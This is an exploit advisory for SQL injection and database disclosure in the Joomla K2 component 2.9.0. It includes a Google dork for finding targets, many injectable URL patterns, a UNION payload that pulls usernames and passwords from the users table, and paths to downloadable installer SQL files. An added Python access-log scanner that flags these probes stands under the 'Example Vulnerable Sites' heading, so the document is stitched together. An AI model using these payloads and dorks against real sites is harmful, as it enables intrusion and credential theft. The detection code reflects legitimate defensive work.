####################################################################
# Exploit Title : Joomla K2 Components 2.9.0 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/02/2019
# Vendor Homepage : getk2.org
# Software Download Link : getk2.org/downloads/?f=K2_v2.9.0.zip
# Software Information Link : extensions.joomla.org/extension/k2/
# Software Version : 2.9.0 and previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_k2''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Old Similar CVE [ Only Version is Different ] : CVE-2009-2395
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
The powerful award-winning content extension for Joomla with
more than 3 million downloads (and counting)!
K2 provides an out-of-the box integrated solution featuring rich content forms
for items (think of Joomla articles with additional fields for article images, videos,
image galleries and attachments), nested-level categories, tags, comments,
a system to extend the item base form with additional fields (similar to CCK
for those acquainted with Drupal), a powerful plugin API to extend item,
category and user forms, ACL, frontend editing, sub-templates & a lot more!
Using K2, you can transform your Joomla website to a news/magazine site
with author blogs, product catalogs, work portfolio, knowledge base,
download/document manager, directory listing, event listing & more,
all this bundled under one package!
####################################################################
# Impact :
***********
The Joomla K2 component, version 2.9.0 and earlier, is prone to an SQL injection
vulnerability because it fails to sufficiently sanitize user-supplied data before
using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application
and execute arbitrary SQL commands in the application's database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser.
* This software is also prone to an information exposure / database disclosure vulnerability.
Successful exploits of this issue may allow an attacker to obtain sensitive
information by downloading the full contents of the application's database.
* Any remote user may download the database files and gain access
to sensitive information including unencrypted authentication credentials.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_k2&view=itemlist&category=[SQL Injection]
/index.php/component/users/?option=com_k2&view=itemlist&task=user&id=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=category&id=[ID-NUMBER]:video&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=user&id=[SQL Injection]
/index.php?option=com_k2&view=item&layout=item&id=[SQLi]&Itemid=[SQL Injection]&lang=en
/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL Injection]
/index.php?option=com_k2&view=item&layout=item&id=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=user&id=[ID-NUMBER][TOPIC-NAME]&Itemid=[SQL Injection]
/index.php?option=com_k2&view=item&id=[ID-NUMBER]:[TOPIC-NAME]&tmpl=component&print=[SQL Injection]
/index.php?option=com_k2&view=item&layout=item&id=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=tag&tag=[TAG-NAME-HERE]&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=tag&tag=[TAG-NAME-HERE]&format=feed&type=atom&Itemid=[SQL Injection]
/index.php?option=com_k2&view=itemlist&task=date&year=[YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
# Example SQL Injection Payload :
******************************
null'+and+1=2+union+select+1,concat(username,0x3a,password)KingSkrupellos,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
####################################################################
# Database Disclosure Exploit :
***************************
/administrator/components/com_k2/install.mysql.sql
/administrator/components/com_k2/uninstall.mysql.sql
Both files are the installer and uninstaller SQL scripts shipped inside the
component; they are served as static files whenever that directory is web-accessible.
####################################################################
# Example Vulnerable Sites :
*************************
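Detection logic for the two issues above (the injection points in the K2 request parameters and the download of the installer SQL scripts), as an added example that is not part of the original advisory: it parses web-server access-log lines in Common Log Format and flags K2 requests whose parameters carry fragments of the payload shown above, non-numeric values where K2 expects an item or menu id, or a fetch of install.mysql.sql / uninstall.mysql.sql. The log lines are constructed samples, and the verdict labels and parameter list are my own choices.

```python
import re
from urllib.parse import urlparse, parse_qs

# Parameters the advisory lists as injection points; legitimate K2 URLs carry an
# integer there, optionally followed by ":slug" (e.g. id=20:video).
NUMERIC_PARAMS = {"id", "Itemid", "category", "limitstart"}
NUMERIC_RE = re.compile(r"\d+(:[\w-]+)?")
# Fragments of the UNION payload shown above; the bare quote is what the probe URLs append.
SQLI_RE = re.compile(r"\bunion\b|\bselect\b|concat\(|/\*|--|'", re.I)
# Installer scripts named in the database-disclosure section.
SQL_FILE_RE = re.compile(r"/administrator/components/com_k2/(un)?install\.mysql\.sql$", re.I)
# Common Log Format (Apache/nginx default); only the client IP and request path are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3}')

def classify(line):
    """Return a verdict label for a suspicious K2 request in one log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("path"))
    if SQL_FILE_RE.search(url.path):
        return "k2-sql-file-download"
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if not params.get("option", [""])[0].startswith("com_k2"):  # com_k2 and com_k2store
        return None
    for name, values in params.items():
        for value in values:
            if SQLI_RE.search(value):
                return "k2-sqli-payload"
            if name in NUMERIC_PARAMS and not NUMERIC_RE.fullmatch(value):
                return "k2-malformed-id"
    return None

def scan(lines):
    """Return (client IP, verdict) for every flagged log line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((LOG_RE.match(line).group("ip"), verdict))
    return hits

# Constructed sample log lines (not real traffic), modelled on the URL patterns above.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_k2&view=itemlist&task=user&id=62770%27 HTTP/1.1" 500 812',
    '203.0.113.5 - - [04/Feb/2019:10:00:02 +0000] "GET /index.php?option=com_k2&view=itemlist&category=null%27+and+1=2+union+select+1,concat(username,0x3a,password),3+from+jos_users/* HTTP/1.1" 200 4096',
    '198.51.100.7 - - [04/Feb/2019:10:00:03 +0000] "GET /index.php?option=com_k2&view=item&id=20:video&Itemid=175 HTTP/1.1" 200 9731',
    '203.0.113.5 - - [04/Feb/2019:10:00:04 +0000] "GET /administrator/components/com_k2/install.mysql.sql HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Feb/2019:10:00:05 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 1200',
]
```

Running scan(SAMPLE_LOG) over the constructed lines flags the three probes from 203.0.113.5 and leaves the two ordinary requests alone; the quote-only rule is deliberately noisy and should be tuned against real traffic before alerting on it.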
####################################################################
# Example SQL Database Error :
****************************
The output below consists of PHP compatibility warnings emitted by the Joomla core
libraries and the K2 component rather than database error output; on its own it
shows the site is running unmaintained code, not that the injection succeeded.
Warning: Declaration of JParameter::loadSetupFile($path) should be compatible with JRegistry::loadSetupFile() in /home/personer/public_html/libraries/joomla/html/parameter.php on line 512
Warning: Declaration of JCacheControllerPage::store($wrkarounds = true) should be compatible with JCacheController::store($data, $id, $group = NULL) in /home/personer/public_html/libraries/joomla/cache/controller/page.php on line 199
Warning: preg_replace(): The /e modifier is no longer supported, use preg_replace_callback instead in /home/personer/public_html/libraries/joomla/filter/input.php on line 652
Warning: Use of undefined constant K2_JVERSION - assumed 'K2_JVERSION' (this will throw an Error in a future version of PHP) in /home/personer/public_html/components/com_k2/k2.php on line 13
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################